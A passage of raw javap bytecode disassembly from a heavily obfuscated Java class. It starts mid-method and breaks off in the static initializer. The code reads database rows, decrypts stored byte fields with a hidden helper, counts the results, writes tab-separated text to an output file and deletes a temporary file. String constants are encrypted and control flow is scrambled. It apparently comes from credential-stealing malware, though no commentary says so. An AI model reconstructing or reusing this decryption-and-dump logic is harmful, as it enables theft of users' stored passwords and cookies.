       687: aload         14
       689: iconst_4
       690: invokeinterface #75,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       695: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       698: iload         9
       700: ifne          809
       703: goto          707
       706: athrow
       707: pop
       708: goto          712
       711: athrow
       712: lload         5
       714: lconst_0
       715: lcmp
       716: ifle          782
       719: aload         16
       721: aload         14
       723: iconst_1
       724: invokeinterface #75,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       729: invokeinterface #189,  2          // InterfaceMethod java/util/Map.containsKey:(Ljava/lang/Object;)Z
       734: ifeq          786
       737: aload         15
       739: ldc           #4                  // int -1810863120
       741: sipush        -16967
       744: iadd
       745: ldc           #4                  // int -1810863120
       747: sipush        -23275
       750: iadd
       751: lload         5
       753: l2i
       754: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       757: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       760: aload         16
       762: aload         14
       764: iconst_1
       765: invokeinterface #75,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       770: invokeinterface #275,  2          // InterfaceMethod java/util/Map.get:(Ljava/lang/Object;)Ljava/lang/Object;
       775: checkcast     #325                // class java/lang/String
       778: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       781: pop
       782: goto          786
       785: athrow
       786: aload         15
       788: ldc           #4                  // int -1810863120
       790: sipush        -16986
       793: iadd
       794: ldc           #19                 // int 1810863120
       796: sipush        25270
       799: iadd
       800: lload         5
       802: l2i
       803: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       806: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       809: pop
       810: iload         9
       812: ifeq          529
       815: iload         9
       817: lload         5
       819: lconst_0
       820: lcmp
       821: ifle          2070
       824: lload         5
       826: lconst_0
       827: lcmp
       828: ifle          836
       831: ifeq          1772
       834: iload         8
       836: iload         9
       838: ifne          1161
       841: goto          845
       844: athrow
       845: iconst_4
       846: goto          850
       849: athrow
       850: if_icmpne     1150
       853: new           #291                // class java/text/SimpleDateFormat
       856: dup
       857: ldc           #4                  // int -1810863120
       859: sipush        -16964
       862: iadd
       863: ldc           #19                 // int 1810863120
       865: sipush        5089
       868: isub
       869: lload         5
       871: l2i
       872: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       875: invokespecial #288                // Method java/text/SimpleDateFormat."<init>":(Ljava/lang/String;)V
       878: astore        16
       880: aload         14
       882: invokeinterface #111,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
       887: ifeq          1131
       890: aload         14
       892: iconst_4
       893: invokeinterface #52,  2           // InterfaceMethod java/sql/ResultSet.getLong:(I)J
       898: lstore        17
       900: lload         17
       902: lconst_0
       903: lcmp
       904: iload         9
       906: ifne          1784
       909: ifle          960
       912: goto          916
       915: athrow
       916: aload         16
       918: new           #80                 // class java/util/Date
       921: dup
       922: lload         17
       924: sipush        8965
       927: ldc2_w        #381                // long 7689134441536113162l
       930: lload         5
       932: lxor
       933: invokestatic  #346                // Method a:(IJ)J
       936: ldiv
       937: sipush        10336
       940: ldc2_w        #371                // long 4865425194973806957l
       943: lload         5
       945: lxor
       946: invokestatic  #346                // Method a:(IJ)J
       949: lsub
       950: invokespecial #229                // Method java/util/Date."<init>":(J)V
       953: invokevirtual #234                // Method java/text/SimpleDateFormat.format:(Ljava/util/Date;)Ljava/lang/String;
       956: goto          978
       959: athrow
       960: ldc           #4                  // int -1810863120
       962: sipush        -16983
       965: iadd
       966: ldc           #19                 // int 1810863120
       968: sipush        5213
       971: iadd
       972: lload         5
       974: l2i
       975: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       978: astore        19
       980: aload         15
       982: ldc           #4                  // int -1810863120
       984: sipush        -16946
       987: iadd
       988: ldc           #19                 // int 1810863120
       990: sipush        14720
       993: iadd
       994: lload         5
       996: l2i
       997: invokestatic  #349                // Method a:(III)Ljava/lang/String;
      1000: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1003: aload         14
      1005: iconst_1
      1006: invokeinterface #75,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1011: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1014: ldc           #4                  // int -1810863120
      1016: sipush        -16991
      1019: iadd
      1020: ldc           #19                 // int 1810863120
      1022: sipush        7740
      1025: iadd
      1026: lload         5
      1028: l2i
      1029: invokestatic  #349                // Method a:(III)Ljava/lang/String;
      1032: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1035: aload         14
      1037: iconst_2
      1038: invokeinterface #75,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1043: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1046: ldc           #4                  // int -1810863120
      1048: sipush        -16960
      1051: iadd
      1052: ldc           #19                 // int 1810863120
      1054: sipush        12353
      1057: iadd
      1058: lload         5
      1060: l2i
      1061: invokestatic  #349                // Method a:(III)Ljava/lang/String;
      1064: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1067: aload         14
      1069: iconst_3
      1070: invokeinterface #235,  2          // InterfaceMethod java/sql/ResultSet.getInt:(I)I
      1075: invokevirtual #163                // Method java/lang/StringBuilder.append:(I)Ljava/lang/StringBuilder;
      1078: ldc           #4                  // int -1810863120
      1080: sipush        -16989
      1083: iadd
      1084: ldc           #4                  // int -1810863120
      1086: sipush        -1624
      1089: isub
      1090: lload         5
      1092: l2i
      1093: invokestatic  #349                // Method a:(III)Ljava/lang/String;
      1096: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1099: aload         19
      1101: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1104: ldc           #4                  // int -1810863120
      1106: sipush        -16996
      1109: iadd
      1110: ldc           #4                  // int -1810863120
      1112: sipush        -10169
      1115: iadd
      1116: lload         5
      1118: l2i
      1119: invokestatic  #349                // Method a:(III)Ljava/lang/String;
      1122: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1125: pop
      1126: iload         9
      1128: ifeq          880
      1131: iload         9
      1133: lload         5
      1135: lconst_0
      1136: lcmp
      1137: iflt          1784
      1140: lload         5
      1142: lconst_0
      1143: lcmp
      1144: ifle          1157
      1147: ifeq          1772
      1150: aload         14
      1152: invokeinterface #111,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
      1157: goto          1161
      1160: athrow
      1161: ifeq          1772
      1164: iload         8
      1166: lload         5
      1168: lconst_0
      1169: lcmp
      1170: iflt          1784
      1173: iload         9
      1175: ifne          1784
      1178: iconst_1
      1179: iload         9
      1181: lload         5
      1183: lconst_0
      1184: lcmp
      1185: ifle          1380
      1188: ifne          1378
      1191: goto          1195
      1194: athrow
      1195: if_icmpne     1375
      1198: goto          1202
      1201: athrow
      1202: aload         14
      1204: iconst_3
      1205: invokeinterface #306,  2          // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
      1210: invokestatic  #190                // Method a/b/d/dec.k3l:([B)Ljava/lang/String;
      1213: astore        16
      1215: aload         16
      1217: lload         5
      1219: lconst_0
      1220: lcmp
      1221: iflt          1238
      1224: iload         9
      1226: ifne          1238
      1229: ifnull        1363
      1232: goto          1236
      1235: athrow
      1236: aload         16
      1238: invokevirtual #348                // Method java/lang/String.isEmpty:()Z
      1241: iload         9
      1243: ifne          1262
      1246: ifne          1363
      1249: goto          1253
      1252: athrow
      1253: getstatic     #279                // Field e:I
      1256: iconst_1
      1257: iadd
      1258: goto          1262
      1261: athrow
      1262: putstatic     #279                // Field e:I
      1265: aload         15
      1267: ldc           #4                  // int -1810863120
      1269: sipush        -16985
      1272: iadd
      1273: ldc           #19                 // int 1810863120
      1275: sipush        23339
      1278: iadd
      1279: lload         5
      1281: l2i
      1282: invokestatic  #349                // Method a:(III)Ljava/lang/String;
      1285: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1288: aload         14
      1290: iconst_1
      1291: invokeinterface #75,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1296: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1299: ldc           #2                  // String \n
      1301: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1304: aload         14
      1306: iconst_2
      1307: invokeinterface #75,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1312: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1315: ldc           #4                  // int -1810863120
      1317: sipush        -16980
      1320: iadd
      1321: ldc           #19                 // int 1810863120
      1323: sipush        7106
      1326: iadd
      1327: lload         5
      1329: l2i
      1330: invokestatic  #349                // Method a:(III)Ljava/lang/String;
      1333: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1336: aload         16
      1338: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1341: ldc           #4                  // int -1810863120
      1343: sipush        -16996
      1346: iadd
      1347: ldc           #4                  // int -1810863120
      1349: sipush        -10169
      1352: iadd
      1353: lload         5
      1355: l2i
      1356: invokestatic  #349                // Method a:(III)Ljava/lang/String;
      1359: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1362: pop
      1363: iload         9
      1365: lload         5
      1367: lconst_0
      1368: lcmp
      1369: iflt          1377
      1372: ifeq          1150
      1375: iload         8
      1377: iconst_2
      1378: iload         9
      1380: ifne          1643
      1383: if_icmpne     1635
      1386: goto          1390
      1389: athrow
      1390: aload         14
      1392: iconst_5
      1393: invokeinterface #306,  2          // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
      1398: aload         14
      1400: iconst_1
      1401: invokeinterface #75,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1406: invokestatic  #156                // Method a/b/d/dec.k3l:([BLjava/lang/String;)Ljava/lang/String;
      1409: astore        16
      1411: lload         5
      1413: lconst_0
      1414: lcmp
      1415: iflt          1444
      1418: iload         9
      1420: ifne          1444
      1423: aload         16
      1425: ifnull        1623
      1428: goto          1432
      1431: athrow
      1432: getstatic     #90                 // Field W:I
      1435: iconst_1
      1436: iadd
      1437: putstatic     #90                 // Field W:I
      1440: goto          1444
      1443: athrow
      1444: aload         15
      1446: aload         14
      1448: iconst_1
      1449: invokeinterface #75,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1454: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1457: ldc           #4                  // int -1810863120
      1459: sipush        -16984
      1462: iadd
      1463: ldc           #4                  // int -1810863120
      1465: sipush        -18400
      1468: iadd
      1469: lload         5
      1471: l2i
      1472: invokestatic  #349                // Method a:(III)Ljava/lang/String;
      1475: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1478: aload         14
      1480: iconst_3
      1481: invokeinterface #75,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1486: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1489: lload         5
      1491: lconst_0
      1492: lcmp
      1493: iflt          1506
      1496: ldc           #11                 // String \t
      1498: iload         9
      1500: ifne          1551
      1503: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1506: aload         14
      1508: iconst_4
      1509: invokeinterface #235,  2          // InterfaceMethod java/sql/ResultSet.getInt:(I)I
      1514: iconst_1
      1515: lload         5
      1517: lconst_0
      1518: lcmp
      1519: iflt          1566
      1522: if_icmpne     1554
      1525: goto          1529
      1528: athrow
      1529: ldc           #4                  // int -1810863120
      1531: sipush        -16994
      1534: iadd
      1535: ldc           #19                 // int 1810863120
      1537: sipush        19769
      1540: iadd
      1541: lload         5
      1543: l2i
      1544: invokestatic  #349                // Method a:(III)Ljava/lang/String;
      1547: goto          1551
      1550: athrow
      1551: goto          1572
      1554: ldc           #4                  // int -1810863120
      1556: sipush        -16977
      1559: iadd
      1560: ldc           #19                 // int 1810863120
      1562: sipush        17035
      1565: iadd
      1566: lload         5
      1568: l2i
      1569: invokestatic  #349                // Method a:(III)Ljava/lang/String;
      1572: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1575: ldc           #4                  // int -1810863120
      1577: sipush        -17006
      1580: iadd
      1581: ldc           #4                  // int -1810863120
      1583: sipush        -1608
      1586: isub
      1587: lload         5
      1589: l2i
      1590: invokestatic  #349                // Method a:(III)Ljava/lang/String;
      1593: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1596: aload         14
      1598: iconst_2
      1599: invokeinterface #75,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1604: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1607: ldc           #11                 // String \t
      1609: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1612: aload         16
      1614: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1617: ldc           #2                  // String \n
      1619: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1622: pop
      1623: iload         9
      1625: lload         5
      1627: lconst_0
      1628: lcmp
      1629: ifle          1637
      1632: ifeq          1150
      1635: iload         8
      1637: iload         9
      1639: ifne          1161
      1642: iconst_3
      1643: if_icmpne     1150
      1646: aload         14
      1648: iconst_2
      1649: invokeinterface #306,  2          // InterfaceMethod java/sql/ResultSet.getBytes:(I)[B
      1654: invokestatic  #190                // Method a/b/d/dec.k3l:([B)Ljava/lang/String;
      1657: astore        16
      1659: iload         9
      1661: ifne          1685
      1664: aload         16
      1666: ifnull        1767
      1669: goto          1673
      1672: athrow
      1673: getstatic     #118                // Field I:I
      1676: iconst_1
      1677: iadd
      1678: putstatic     #118                // Field I:I
      1681: goto          1685
      1684: athrow
      1685: aload         15
      1687: ldc           #4                  // int -1810863120
      1689: sipush        -16999
      1692: iadd
      1693: ldc           #4                  // int -1810863120
      1695: sipush        -16760
      1698: iadd
      1699: lload         5
      1701: l2i
      1702: invokestatic  #349                // Method a:(III)Ljava/lang/String;
      1705: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1708: aload         14
      1710: iconst_1
      1711: invokeinterface #75,  2           // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
      1716: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1719: ldc           #4                  // int -1810863120
      1721: sipush        -16956
      1724: iadd
      1725: ldc           #19                 // int 1810863120
      1727: sipush        864
      1730: iadd
      1731: lload         5
      1733: l2i
      1734: invokestatic  #349                // Method a:(III)Ljava/lang/String;
      1737: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1740: aload         16
      1742: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1745: ldc           #4                  // int -1810863120
      1747: sipush        -16996
      1750: iadd
      1751: ldc           #4                  // int -1810863120
      1753: sipush        -10169
      1756: iadd
      1757: lload         5
      1759: l2i
      1760: invokestatic  #349                // Method a:(III)Ljava/lang/String;
      1763: invokevirtual #125                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
      1766: pop
      1767: iload         9
      1769: ifeq          1150
      1772: lload         5
      1774: lconst_0
      1775: lcmp
      1776: ifle          1164
      1779: aload         15
      1781: invokevirtual #131                // Method java/lang/StringBuilder.length:()I
      1784: ifle          1837
      1787: aload         4
      1789: aload         7
      1791: ldc           #4                  // int -1810863120
      1793: sipush        -17001
      1796: iadd
      1797: ldc           #19                 // int 1810863120
      1799: sipush        8383
      1802: iadd
      1803: lload         5
      1805: l2i
      1806: invokestatic  #349                // Method a:(III)Ljava/lang/String;
      1809: dup_x2
      1810: pop
      1811: ldc           #3                  // String /
      1813: swap
      1814: invokedynamic #299,  0            // InvokeDynamic #2:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
      1819: goto          1823
      1822: athrow
      1823: aload         15
      1825: invokevirtual #98                 // Method java/lang/StringBuilder.toString:()Ljava/lang/String;
      1828: getstatic     #88                 // Field java/nio/charset/StandardCharsets.UTF_8:Ljava/nio/charset/Charset;
      1831: invokevirtual #109                // Method java/lang/String.getBytes:(Ljava/nio/charset/Charset;)[B
      1834: invokestatic  #231                // Method a/b/c/z.a:(Ljava/lang/String;[B)V
      1837: lload         5
      1839: lconst_0
      1840: lcmp
      1841: iflt          1865
      1844: aload         14
      1846: iload         9
      1848: ifne          1860
      1851: ifnull        1913
      1854: goto          1858
      1857: athrow
      1858: aload         14
      1860: invokeinterface #92,  1           // InterfaceMethod java/sql/ResultSet.close:()V
      1865: goto          1913
      1868: astore        15
      1870: lload         5
      1872: lconst_0
      1873: lcmp
      1874: ifle          1898
      1877: aload         14
      1879: iload         9
      1881: ifne          1893
      1884: ifnull        1910
      1887: goto          1891
      1890: athrow
      1891: aload         14
      1893: invokeinterface #92,  1           // InterfaceMethod java/sql/ResultSet.close:()V
      1898: goto          1910
      1901: astore        16
      1903: aload         15
      1905: aload         16
      1907: invokevirtual #176                // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
      1910: aload         15
      1912: athrow
      1913: lload         5
      1915: lconst_0
      1916: lcmp
      1917: iflt          1941
      1920: aload         13
      1922: iload         9
      1924: ifne          1936
      1927: ifnull        1989
      1930: goto          1934
      1933: athrow
      1934: aload         13
      1936: invokeinterface #335,  1          // InterfaceMethod java/sql/Statement.close:()V
      1941: goto          1989
      1944: astore        14
      1946: lload         5
      1948: lconst_0
      1949: lcmp
      1950: ifle          1974
      1953: aload         13
      1955: iload         9
      1957: ifne          1969
      1960: ifnull        1986
      1963: goto          1967
      1966: athrow
      1967: aload         13
      1969: invokeinterface #335,  1          // InterfaceMethod java/sql/Statement.close:()V
      1974: goto          1986
      1977: astore        15
      1979: aload         14
      1981: aload         15
      1983: invokevirtual #176                // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
      1986: aload         14
      1988: athrow
      1989: lload         5
      1991: lconst_0
      1992: lcmp
      1993: ifle          2017
      1996: aload         12
      1998: iload         9
      2000: ifne          2012
      2003: ifnull        2065
      2006: goto          2010
      2009: athrow
      2010: aload         12
      2012: invokeinterface #347,  1          // InterfaceMethod java/sql/Connection.close:()V
      2017: goto          2065
      2020: astore        13
      2022: lload         5
      2024: lconst_0
      2025: lcmp
      2026: ifle          2050
      2029: aload         12
      2031: iload         9
      2033: ifne          2045
      2036: ifnull        2062
      2039: goto          2043
      2042: athrow
      2043: aload         12
      2045: invokeinterface #347,  1          // InterfaceMethod java/sql/Connection.close:()V
      2050: goto          2062
      2053: astore        14
      2055: aload         13
      2057: aload         14
      2059: invokevirtual #176                // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
      2062: aload         13
      2064: athrow
      2065: aload         11
      2067: invokevirtual #144                // Method java/io/File.delete:()Z
      2070: pop
      2071: goto          2096
      2074: astore        12
      2076: aload         11
      2078: invokevirtual #144                // Method java/io/File.delete:()Z
      2081: pop
      2082: goto          2096
      2085: astore        20
      2087: aload         11
      2089: invokevirtual #144                // Method java/io/File.delete:()Z
      2092: pop
      2093: aload         20
      2095: athrow
      2096: return
      Exception table:
         from    to  target type
           407   431   434   Class java/lang/Throwable
           398   410   413   Class java/lang/Throwable
           384   403   406   Class java/lang/Throwable
           142   152   155   Class java/lang/Throwable
            95   110   113   Class java/lang/Throwable
            88   102   105   Class java/lang/Throwable
            78    91    94   Class java/lang/Throwable
           361   441   479   Class java/lang/Throwable
           502   509   512   Class java/lang/Throwable
           481   498   501   Class java/lang/Throwable
           441   465   468   Class java/lang/Throwable
           329   524   527   Class java/lang/Exception
          1784  1819  1822   Class java/lang/Throwable
          1664  1681  1684   Class java/lang/Throwable
          1659  1669  1672   Class java/lang/Throwable
          1503  1547  1550   Class java/lang/Throwable
          1444  1525  1528   Class java/lang/Throwable
          1423  1440  1443   Class java/lang/Throwable
          1411  1428  1431   Class java/lang/Throwable
          1378  1386  1389   Class java/lang/Throwable
          1246  1258  1261   Class java/lang/Throwable
          1238  1249  1252   Class java/lang/Throwable
          1215  1232  1235   Class java/lang/Throwable
          1178  1198  1201   Class java/lang/Throwable
          1164  1191  1194   Class java/lang/Throwable
          1131  1157  1160   Class java/lang/Throwable
           909   959   959   Class java/lang/Throwable
           900   912   915   Class java/lang/Throwable
           834   846   849   Class java/lang/Throwable
           815   841   844   Class java/lang/Throwable
           712   782   785   Class java/lang/Throwable
           582   708   711   Class java/lang/Throwable
           575   703   706   Class java/lang/Throwable
           564   578   581   Class java/lang/Throwable
           552   571   574   Class java/lang/Throwable
           305   316   319   Class java/lang/Throwable
           296  1837  1868   Class java/lang/Throwable
          1891  1898  1901   Class java/lang/Throwable
          1870  1887  1890   Class java/lang/Throwable
          1837  1854  1857   Class java/lang/Throwable
           286  1913  1944   Class java/lang/Throwable
          1967  1974  1977   Class java/lang/Throwable
          1946  1963  1966   Class java/lang/Throwable
          1913  1930  1933   Class java/lang/Throwable
           277  1989  2020   Class java/lang/Throwable
          2043  2050  2053   Class java/lang/Throwable
           196   236  2074   Class java/lang/Exception
          2022  2039  2042   Class java/lang/Throwable
          1989  2006  2009   Class java/lang/Throwable
           243  2065  2074   Class java/lang/Exception
           196   236  2085   any
           243  2065  2085   any
          2074  2076  2085   any
          2085  2087  2085   any

  static {};
    Code:
         0: ldc2_w        #367                // long 137412006946311l
         3: lstore        6
         5: bipush        57
         7: anewarray     #325                // class java/lang/String
        10: astore        13
        12: iconst_0
        13: istore        11
        15: ldc           #8                  // String ¤ÿÿÒ®\u0098?,TÔTQþ\u0087Í\u0003\u0013Ch\u0005Í°uJ\u008e\u0007!§\u001fÈ¨á±\u0003ÿ|7\u0006ì2é«À½.úø$Ñ¢½Ú\u0082¾\u0090\u0099^ä¤|L¼þ\u009f­¢\bpôàIk×\u0080\u001f\u0099\n¹5ÄâmÔNkÎ\\ÀÀÐV\u0005ÖÐ¿6\u007fb\u0093à\tÒ\u0007Ýn\u0095;\u000b\u0011\u0000ÁÈ3\u0091÷\u0099·Ò>\u0014Jå4\u0085cO\u0005æ!`Aw?R\u0005È\u001brp¢\u0090zÁ¾¹\t=ÒÆ\u00018\u0011o\u0010\'c¸|Uì±ÕÌÉÕ\u0087Áç\u0084\u001e\u0012x)\u001cÉ\u001d\u0017p\u0013\u008f¼ùs\u0000Î\u007f\u001e¼Î;É)°\u0091\u000f±\u0007P­®{ªp\u007f#\u0099j\u009a\u008cT\b¨#\u0012ÌóëÇÎ\u001de|\u009asöNsú\u00978\u0096\u009eðñ\u0019\u0097âõÅ«\u0002¥Ò\bbó`²\u0084÷Î\u0092\tB4\u001fÉ\fÁm.\u0083\u0007g(ÈÛ\u0091\u0085^\bQ.ûJµ2\u008bï\fÉ\u009a±ÒñL.5{³\u0091þ\u0002Ã¿\b[£ºû\u009d\u0004\u008e)\u0004­60ý\u0007É\u009bÜ=\u0096B\u009f&âo÷à\u0014\nìbb´÷­+\u0018\u0080(»\b\u009d\u0017£ì.öè\u008fß\u001bëª×©5â[\u009cs±\u000f+_\u00983&³¨\u0093ðÄ<ÑRÜø\u000eWµµü\u0080\u0085\u0011_tcbhe\u0012\bI>\u001e\u0015ÿw¼C\u000b¡GPÖ\nxÃ\u0011\u0081\u0005\u0019\u000f Ð\u007f7¾$=»\u0014&\\\u000fÿLí\u0006\u0001ë¨ðP\u0017\u0007\u0080TZ\u0005\u0000ý²\nÏÒU×ï \u009fÔë¸\f_å Q h\u009dù%¤ãô\fS;yL+\u009c\u0006¶\u0085¸R-\ræ\u001eû\u009bµ?Ø\u0084ôX\u00918\u0082\t¿R¶f^dâ\u009aP\u0007\u0083ÿL©[\u0083\u0015(æ\u008cuP©\u0093\u0017På¢\r&\u0018wæR\u0003|\u009c*³èEäÏø`=. lÕ\u008a#D.1xbJ@çá\u0087òÖÙT\u0007{\f¶I Fä\u0010¯uýÜî&ùNõ³*\"¶¨úhaÚ\u0000©é@3íß·T\u001cò$«<xI-Ä *¸\u0000à(õ;\u0088ÒV³\u000bZrw\u0018<µù!½¹_\tZ\u0089{½v,\u0017ó^R(8~Éé¾³ä\u009d\u0084#rË\u001a\u0083\u0006\baäÜ1òo\u0089Î\u009bÂ \u0098dJñ\u0087Ñ\u000b\u0003¼ÐáSè\u008aàÌ\u0003D\u0083\u001c$ph\"pz¦T\u0084þ¦=\u008f\u0011\u0003î»»TP;¥¨bÚ\u007f}Va/e\u0000©\u0097\rÇÄëJa\u009cK>[\u0006dó<\bÆFü^\u0007q\u0084B\u0007ÚÍ\u00116i\u009b\u009f)Æûq¾)N\u0007ëçÕMÈ\u0010ªçé#\u000b\u0098Ä35U_Í\u008f Ó&}mnªT@Û\u0082\u009f\u001e©\u0014\u0012½bÒ`ÒªE\u009bW\u008bQJÿä-\u0090Ô\u008c\tx\u0086#Yé|\u008fÊl\u0005\"?!Ë¬KÖ\u0016¡\f\u0012\u0006Ìôo{ÐâÁÂk>Ô±ûÔ­¡z\u009dtÝ\u0098¡)AÿvÛ\u0007\u0017\u008f\'\u0087¿Agád¢è@VÐ,\u0001ðú@{ÍbK¥\u001cºfîÆr26á3\u0084k^K.êRs\u0004Èû×Y}¥\u0093E\u009eq\u001bØ!ÛJ]°­òí\u001bÈ\u0010V²<\u001f^úÛ5þÐ~\nE\u0092\u0000)\u0090V\\¼À=ä \u0007\u008de÷îËÉ!fUõw\u007fÌ\u0080yÈ\u001cn\u009e¿+[¦ãs\u0012ébäzËós\u0091\u009dû1jÞ\u0004LrE\u0095Î\u0091þ\u0083p¿Ø8(!¼÷x\u0006¡:\u008fà¡ä½Ý\u0013CçIµò\u0093\u001e>ã%Ò¤\bj¨ýáj\u0092\tSñ+\u0012íê\u0094K\u009e\u0007ó\u0094\u0010\u001dIþ\u009b\u0006¡õ\'°â#\u000föc#´QCF\u008d-\u0007\u0087©%Ó\u0016\u0006ñ+\u0003\u009e\u008d³
        17: dup
        18: astore        10
        20: invokevirtual #247                // Method java/lang/String.length:()I
        23: istore        12
        25: bipush        15
        27: istore        9
        29: iconst_m1
        30: istore        8
        32: iinc          8, 1
        35: aload         10
        37: iload         8
        39: dup
        40: iload         9
        42: iadd
        43: invokevirtual #339                // Method java/lang/String.substring:(II)Ljava/lang/String;
        46: iconst_m1
        47: goto          184
        50: aload         13
        52: swap
        53: iload         11
        55: iinc          11, 1
        58: swap
        59: aastore
        60: iload         8
        62: iload         9
        64: iadd
        65: dup
        66: istore        8
        68: iload         12
        70: if_icmpge     85
        73: aload         10
        75: iload         8
        77: invokevirtual #287                // Method java/lang/String.charAt:(I)C
        80: istore        9
        82: goto          32
        85: ldc           #15                 // String BVäGÙ²Y\u00963ð\u000b\u000bi+¢.\twC\'õ\f
        87: dup
        88: astore        10
        90: invokevirtual #247                // Method java/lang/String.length:()I
        93: istore        12
        95: bipush        10
        97: istore        9
        99: iconst_m1
       100: istore        8
       102: iinc          8, 1
       105: aload         10
       107: iload         8
       109: dup
       110: iload         9
       112: iadd
       113: invokevirtual #339                // Method java/lang/String.substring:(II)Ljava/lang/String;
       116: iconst_0
       117: goto          184
       120: aload         13
       122: swap
       123: iload         11
       125: iinc          11, 1
       128: swap
       129: aastore
       130: iload         8
       132: iload         9
       134: iadd
       135: dup
       136: istore        8
       138: iload         12
       140: if_icmpge     155
       143: aload         10
       145: iload         8
       147: invokevirtual #287                // Method java/lang/String.charAt:(I)C
       150: istore        9
       152: goto          102
       155: aload         13
       157: putstatic     #283                // Field a:[Ljava/lang/String;
       160: bipush        57
       162: anewarray     #325                // class java/lang/String
       165: putstatic     #110                // Field b:[Ljava/lang/String;
       168: ldc           #13                 // int -1176720670
       170: ldc           #6                  // int 1176724676
       172: lload         6
       174: l2i
       175: invokestatic  #349                // Method a:(III)Ljava/lang/String;
       178: putstatic     #284                // Field F:Ljava/lang/String;
       181: goto          336
       184: swap
       185: invokevirtual #255                // Method java/lang/String.toCharArray:()[C
       188: dup
       189: arraylength
       190: swap
       191: iconst_0
       192: istore        14
       194: swap
       195: dup_x1
       196: iconst_1
       197: if_icmpgt     296
       200: dup
       201: iload         14
       203: dup2
       204: caload
       205: iload         14
       207: bipush        7
       209: irem
       210: tableswitch   { // 0 to 5
                       0: 248
                       1: 253
                       2: 258
                       3: 263
                       4: 268
